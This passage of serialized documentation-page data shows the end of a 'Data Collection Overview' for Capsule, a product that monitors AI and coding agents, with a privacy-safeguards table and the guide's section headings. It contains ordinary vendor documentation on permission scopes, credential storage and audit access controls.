",{"$$mdtype":"Tag","name":"code","attributes":{},"children":["Reports.Read.All"]}," and Copilot-specific scopes on Microsoft Graph, not ",{"$$mdtype":"Tag","name":"code","attributes":{},"children":["Mail.Read"]},"). The full scope list is published per integration."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Read-mostly posture"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["SaaS/Cloud and EDR integrations are read-only with two narrow exceptions: (a) Intune is used to ",{"$$mdtype":"Tag","name":"em","attributes":{},"children":["deploy"]}," the endpoint hook (write to device-management policy, not user data); (b) Capsule may, on customer instruction, push remediation actions back through an integration (e.g., disabling a risky agent). All write actions are explicit, logged, and authorized per action."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Credential vaulting"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["Integration credentials are encrypted at rest, scoped per tenant, and rotatable."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Transparency to the developer"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["Hook installation is performed via the organization's standard endpoint management; the assistant's own UI surfaces that the policy controls are active. Developers can see which decisions were made."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Audit access controls"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["Inside Capsule, access to session content is role-gated. Not every admin can see prompt text; sensitive views are restricted and access is itself logged."]}]},{"$$mdtype":"Tag","name":"tr","attributes":{},"children":[{"$$mdtype":"Tag","name":"td","attributes":{},"children":[{"$$mdtype":"Tag","name":"strong","attributes":{},"children":["Sub-processor disclosure"]}]},{"$$mdtype":"Tag","name":"td","attributes":{},"children":["The upstream SaaS/Cloud vendors are ",{"$$mdtype":"Tag","name":"em","attributes":{},"children":["not"]}," Capsule sub-processors; they are the customer's own vendors. Capsule's sub-processors (hosting, observability) are listed in the standard DPA."]}]}]}]}]}]},"headings":[{"value":"Data Collection Overview","id":"data-collection-overview","depth":1},{"value":"1. Endpoint Agents (including coding agents)","id":"1-endpoint-agents-including-coding-agents","depth":2},{"value":"1.1 What This Is","id":"11-what-this-is","depth":3},{"value":"1.2 Why Collection Is Necessary","id":"12-why-collection-is-necessary","depth":3},{"value":"1.3 What Is Collected, by Category","id":"13-what-is-collected-by-category","depth":3},{"value":"1.3.1 Session metadata","id":"131-session-metadata","depth":4},{"value":"1.3.2 User identity","id":"132-user-identity","depth":4},{"value":"1.3.3 User prompts to the AI","id":"133-user-prompts-to-the-ai","depth":4},{"value":"1.3.4 Tool calls the AI proposes","id":"134-tool-calls-the-ai-proposes","depth":4},{"value":"1.3.5 Tool results","id":"135-tool-results","depth":4},{"value":"1.3.6 Configured skills and MCP tools","id":"136-configured-skills-and-mcp-tools","depth":4},{"value":"1.4 What Is Collected","id":"14-what-is-collected","depth":3},{"value":"1.5 EDR Integrations (Microsoft Defender, CrowdStrike Falcon)","id":"15-edr-integrations-microsoft-defender-crowdstrike-falcon","depth":3},{"value":"1.5.1 What this is for","id":"151-what-this-is-for","depth":4},{"value":"1.5.2 What is read","id":"152-what-is-read","depth":4},{"value":"1.5.3 What is read","id":"153-what-is-read","depth":4},{"value":"1.5.4 Authorization","id":"154-authorization","depth":4},{"value":"2. SaaS and Cloud Integrations","id":"2-saas-and-cloud-integrations","depth":2},{"value":"2.1 What This Is","id":"21-what-this-is","depth":3},{"value":"2.2 Categories of Integration","id":"22-categories-of-integration","depth":3},{"value":"2.2.1 Identity & device-management integrations","id":"221-identity--device-management-integrations","depth":4},{"value":"2.2.2 AI platform integrations","id":"222-ai-platform-integrations","depth":4},{"value":"2.3 What Is Collected from SaaS/Cloud","id":"23-what-is-collected-from-saascloud","depth":3},{"value":"3. Privacy Safeguards","id":"3-privacy-safeguards","depth":2}],"frontmatter":{"sidebar":"../sidebars.yaml","seo":{"title":"Data Collection Overview"}},"lastModified":"2026-05-18T14:39:25.000Z","pagePropGetterError":{"message":"","name":""}},"slug":"/guides/data-collection-overview","userData":{"isAuthenticated":false,"teams":["anonymous"]},"isPublic":true}